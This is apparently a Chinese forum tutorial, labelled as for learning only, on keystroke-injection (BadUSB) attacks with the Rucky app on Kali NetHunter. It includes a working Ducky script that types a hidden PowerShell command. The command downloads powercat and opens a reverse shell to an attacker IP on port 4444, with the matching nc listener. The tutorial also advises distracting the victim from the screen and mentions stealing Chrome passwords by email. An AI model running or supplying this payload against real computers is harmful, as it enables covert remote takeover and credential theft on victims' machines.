声明:本文旨在用于黑客技术学习和交流,切勿用于非法用途! 本人小白,肯定有很多不专业的地方,大佬轻喷
注: 本教程出自X网络科技,作者:skilfulwriter QQ:2234798500 团队qq群:603791426
什么是rucky呢?
Rucky是kali NetHunter Store(F-Droid)有一个Rucky应用程序(v 2.0),它也是Duck Script解释器。该应用程序可以很好地发送键盘输入和击键,
这里有一些脚本的例子被收集。快速在墙纸上安装热狗,或从Chrome窃取密码并通过电子邮件发送密码……您可以想象得到的一切!https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads这儿有一些鸭子脚本的一些写法
Ducky脚本是USB Rubber Ducky的语言。可以通过任何常见的ascii文本编辑器(例如记事本,vi,emacs,nano,gedit,kedit,TextEdit等)编写脚本。句法
Ducky Script语法很简单。每个命令都位于新行中,并且可能包含以下选项。命令是用全部大写形式编写的,因为鸭子声音很大,并且喜欢以自傲的声音来叫。大多数命令会调用击键,组合键或文本字符串,而某些命令会提供延迟或暂停。下面是命令及其功能的列表,后面是一些用法示例。
本文使用的是在F-Droid商店 安装Rucky,用于当中Badusb的功能,模拟了橡皮鸭的功能,也就是HID attack。打开Rucky应用程序,编写脚本以启动 ,我们打开Rucky,对模拟代码的编辑。*根据橡皮鸭的语法:
代码如下:模拟键盘win+r,延迟500ms,输入字符串cmd,因系统装有中文输入法,所以需要两次回车。
GUI rDELAY 500STRING cmdENTERENTER
效果如下:
那么我们接下测试一个好玩的东西,哈哈,需要准备获取我电脑的的shell,在获取shell的基础之上,再对他的屏幕锁屏。
下面代码为:打开win+r,按shift键切换中英文,并发送powershell代码,获取shell:
GUI rDELAY 500SHIFT ONDELAY 500STRING PowerShell.exe -WindowStyle Hidden -Command “IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’);powercat -c 192.168.110.118 -p 4444 -e cmd”ENTERENTER:如图:
不过还有一个问题,HID攻击的时候,会自动在屏幕上输出代码。所以我还需要转移注意力让他远离电脑屏幕
首先打开kali nethunter终端输入:nc -lp 4444监听端口
获取到shell后我们简单的试个锁屏命令:
以下为锁屏命令:
rundll32.exe user32.dll,LockWorkStation:如图:
效果:如图
结束语:
技术学习需要自己刻苦钻 研,在学习上一定要有坚韧不拔的毅力和百折不挠的耐心,遇到问题后一 定要先思考,再百度,再求助。学习也要学会举一反三,思路也很重要!
学技术就要多折腾,不要因为怕弄坏不舍得乱动,这些东西都不是真正属于你 的,只有技术才是自己的,大胆地折腾大胆地研究和 尝试,系统折腾坏了再重装上,再折腾再研究,久病成医、百炼成钢,最终你会成为一 名大师技术本身要比它所使用的工具重要,而 比技术本身重要的是每个人自身的学习热情与方法。 但是更重 要 的是这过程中你所学会的技能和积累的经验,所有这些 最终的目的是希望你在这一项技能的探索和学习中能够明白怎么在这样一个知识如此繁多与 复杂的世界里快乐而高效地学会一项自己所需要的技能。如果能让你做到这一点,那么这些技术的意义将远远超过它的价值。 信息检索的关键在于构造关键词,一定要学会怎么准确的构造搜索引擎(百度等)的搜索 关键词。更快、更准确的找到自己问题的答案。
技术人员在使用自己所掌握的技术时应该有基本的道德准则,在这样一个时代,技术人员个人信仰的建立极为重要,希 望广大技术人员能够有“为天地立心,为生民立命,为往圣继绝学,为万世开太平”这样的信仰。我们不主张为他人的幸福 牺牲自己,但是我们希望每个人在追求个人幸福的时候,能够不以损害他人的幸福为基础。—-秀野堂主
没有回复内容